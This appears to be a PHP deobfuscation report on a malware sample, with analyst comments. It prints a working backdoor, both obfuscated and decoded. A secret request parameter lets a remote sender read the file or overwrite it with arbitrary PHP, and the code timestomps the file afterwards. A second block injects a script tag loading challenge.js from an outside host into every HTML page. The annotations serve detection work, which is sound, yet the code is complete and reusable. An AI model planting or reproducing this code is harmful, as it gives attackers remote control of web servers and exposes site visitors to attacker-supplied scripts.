PHP Decode
if(isset($_REQUEST["s0788\171\x37\x69\171\60\x712\x6f\153\70\142"])){ if(empty($_REQU..
Decoded Output
<? if(isset($_REQUEST["s0788y7iy0q2ok8b"])){
// Analyst annotation (the code is unchanged): remote self-read / self-overwrite
// handler. It runs whenever the request carries the parameter "s0788y7iy0q2ok8b".
// Knowing that name is the only gate; no other authentication is performed.
// Because $_REQUEST is read, the value can arrive through any input source PHP
// merges into it (query string or POST body; cookies depending on request_order),
// so access logs that record only the URL will miss POSTed control requests.
if(empty($_REQUEST["s0788y7iy0q2ok8b"])){
// Parameter present but empty: reply with this file's own source, raw-deflated
// and hex-encoded, which lets the sender read back what is currently installed.
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
} else {
// Parameter non-empty: replace this file with sender-supplied content.
// The response header below is the LiteSpeed cache purge directive with "*"
// (purge everything), so cached pages are regenerated after the rewrite.
header("X-LiteSpeed-Purge: *");
// Reset the OPcache / APC caches when those extensions are loaded, so the old
// compiled copy of this file is not served; "@" hides any warning.
if(function_exists("opcache_reset")){
@opcache_reset();
}
if(function_exists("apc_clear_cache")){
@apc_clear_cache();
}
// Save the file's current modification and access times before writing.
$joc6p8=filemtime(__FILE__);$o22r67=fileatime(__FILE__);
// The parameter value is hex-decoded (pack "H*"), raw-inflated and written over
// __FILE__. Whatever PHP the sender supplies becomes the new file body, i.e.
// arbitrary code execution on the following request. The echoed value is the
// result of file_put_contents (bytes written).
echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["s0788y7iy0q2ok8b"]))));
// Timestomping: mtime and atime are set to the saved values plus one second, so
// "recently modified files" sweeps are unlikely to flag the rewrite. Integrity
// checks should compare content hashes; on POSIX filesystems the inode change
// time (ctime) is still updated by this call and will disagree with mtime.
@touch(__FILE__,$joc6p8+1,$o22r67+1);
}
// End the request here so a control request never renders the normal page.
die;
}
// Analyst annotation (the code is unchanged): response-rewriting injector.
// It activates only when the Accept header contains "text/html" or is exactly
// "*/*"; requests with any other Accept value (for example JSON API clients)
// receive the page unmodified.
if(isset($_SERVER["HTTP_ACCEPT"])&&(strpos($_SERVER["HTTP_ACCEPT"],"text/html")!==false||$_SERVER["HTTP_ACCEPT"]==="*/*")){
// Output-buffer callback: takes the buffered page and returns it with an async
// script tag inserted immediately before the closing head tag. The script is
// fetched from rkrnp5ib[.]cloudfire[.]quest, path /challenge.js. The host and
// file name look chosen to pass for a CDN challenge script (inferred from the
// names only). str_replace is case-sensitive, so only a literal lower-case
// closing head tag is matched.
function tw2g6a($joc6p8){
return str_replace("</head>","<script type='text/javascript' async src='https://rkrnp5ib.cloudfire.quest/challenge.js'></script></head>",$joc6p8);
}
// Register the callback for all output produced after this point. The tag is
// added to the HTTP response only and is not stored in templates or database
// content, so it is found by inspecting fetched pages, not stored files. A
// Content-Security-Policy script-src allow-list that omits this host would
// stop browsers from loading the script.
ob_start("tw2g6a");
} ?>
Original Code
// Analyst annotation (the code is unchanged): obfuscated self-read / self-overwrite
// handler. Every double-quoted literal mixes octal (\171) and hex (\x37) escapes
// with plain characters; PHP resolves them when the string is parsed. The three
// $_REQUEST keys below are escaped differently but all decode to the same name,
// "s0788y7iy0q2ok8b", so a signature on any single spelling misses the others.
// The function calls themselves (file_put_contents, gzinflate, pack, touch) are
// in clear text and there is no eval, so scanners keyed on eval or base64 do not
// fire, while the file_put_contents(__FILE__, ...) self-write stays searchable.
if(isset($_REQUEST["s0788\171\x37\x69\171\60\x712\x6f\153\70\142"])){
// Parameter present but empty: reply with this file's own source, raw-deflated
// and hex-encoded.
if(empty($_REQUEST["\1630\x37\x38\x38\1717i\x790\x71\x32o\x6b\x38\x62"])){
echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
} else {
// Decodes to the header "X-LiteSpeed-Purge: *" (LiteSpeed cache purge-all).
header("X\x2d\114iteS\160\145\145d\x2dP\x75\x72\x67e\72\40\52");
// Decodes to "opcache_reset": clear the opcode cache if the extension exists.
if(function_exists("\x6fpc\141\x63h\145_\162\145se\x74")){
@opcache_reset();
}
// Decodes to "apc_clear_cache": same for APC.
if(function_exists("\141\x70c\137\143\x6c\x65\x61\x72\x5f\143\x61\x63he")){
@apc_clear_cache();
}
// Save the file's modification and access times before it is overwritten.
$joc6p8=filemtime(__FILE__);$o22r67=fileatime(__FILE__);
// Hex-decode and raw-inflate the parameter value, then write it over this file:
// the sender controls the new file contents, i.e. arbitrary PHP execution.
echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["\x73\60\67\x38\x38\x79\x37i\171\x30\x71\62\x6fk\x38\142"]))));
// Timestomping: set mtime/atime to the saved values plus one second, so
// integrity checks should rely on content hashes, not modification time.
@touch(__FILE__,$joc6p8+1,$o22r67+1);
}
// Control requests stop here and never render the normal page.
die;
}
// Analyst annotation (the code is unchanged): obfuscated response-rewriting
// injector. The $_SERVER keys decode to "HTTP_ACCEPT" and the compared values to
// "text/html" and "*/*": the block runs only when the Accept header contains
// "text/html" or is exactly "*/*".
if(isset($_SERVER["\x48T\x54\x50\x5f\101CC\x45\120\x54"])&&(strpos($_SERVER["\x48T\124P_A\103\x43E\x50\x54"],"\164\x65\170\x74\57\x68\x74m\154")!==false||$_SERVER["\110\124\124P\x5f\101CCE\x50\124"]==="*\x2f\x2a")){
// Output-buffer callback. The search string decodes to the closing head tag and
// the replacement to an async script tag followed by that closing tag. The
// script source is https on host rkrnp5ib[.]cloudfire[.]quest, path
// /challenge.js. The escaping keeps the host name and the word "script" out of
// a plain-text search of the file, so match on the decoded strings.
function tw2g6a($joc6p8){
return str_replace("\74\x2fh\x65\141\x64\76","<s\143\162\151p\x74 \x74\171\x70\x65='\x74\145\170\x74\57j\x61\166\141\x73cri\160t' \141s\x79n\143\40\163\162c=\47\150t\164\160\x73\x3a/\57\x72\153\x72\156\x70\x35\151\142.cl\x6f\165d\146\151\x72\x65\56qu\x65\163\x74\x2f\143\x68\141\154\x6c\x65n\x67e\x2e\x6as\x27\x3e\74\57s\143\x72i\x70\164\x3e<\57\150\145\141\x64\76",$joc6p8);
}
// The argument decodes to "tw2g6a": the function above is registered as the
// output-buffer callback, so all later output passes through it.
ob_start("t\x77\62\x676\x61");
}
Function Calls
strpos | 1 |
Stats
MD5 | 7d698419dfee871c29924a8564911c07 |
Eval Count | 0 |
Decode Time | 98 ms |